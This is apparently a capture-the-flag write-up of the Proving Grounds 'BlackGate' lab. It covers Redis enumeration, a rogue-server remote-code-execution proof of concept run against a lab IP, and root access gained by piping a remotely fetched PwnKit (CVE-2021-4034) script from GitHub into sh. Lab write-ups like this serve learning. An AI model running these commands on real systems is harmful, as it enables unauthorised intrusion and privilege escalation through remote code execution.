BlackGate

Source: Proving Grounds OS: Linux Community Rating: Intermediate

Enumeration & Reconnaissance

  • I started with autorecon which found:

    • SSH (22)

    • REDIS (6379)

  • Not the usual HTTP…

Service Analysis

  • I opened port 6379 in my web browser and received the message: "-ERR wrong number of arguments for 'get' command"

REDIS Message

  • I kept poking around for a while, then searched for CVEs. I found one that provided RCE by creating a rogue Redis server.

Gaining Initial Access

  • I got the PoC and ran it a few times before it successfully gave me a shell: 

python redis-rogue-server.py --rhost 192.168.192.176 --lhost 192.168.45.201
RedisRogueServer

Privilege Escalation

  • While I was in, I tried to look for privilege escalation vectors. I started with the basics, running sudo -l revealed that /usr/local/bin/redis-status could be run as root without a password. However, couldn't find a known exploit and I couldn’t run it since it requires an Authorization Key.

redis-status

  • I then checked other things like cron tabs, kernel exploits, SUIDs, etc., but nothing worked.

  • There were multiple articles about a way to exploit redis by adding ssh keys to the authorized keys directory, I dived through this for a while before I called it off. I then went through the list of CVEs that linpeas showed.

CVEs

  • The first one I tried (CVE-2021-3490) didn’t work, but then when I tried CVE-2021-4034 it worked right away. I just had to run:

sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

  • and I got root.

Access as Root

Lessons Learned

  • Running a rogue server can turn a misconfigured Redis instance into an RCE vector.

  • Checking multiple CVEs can reveal the path for privilege escalation.

PreviousHubNextBoolean

Last updated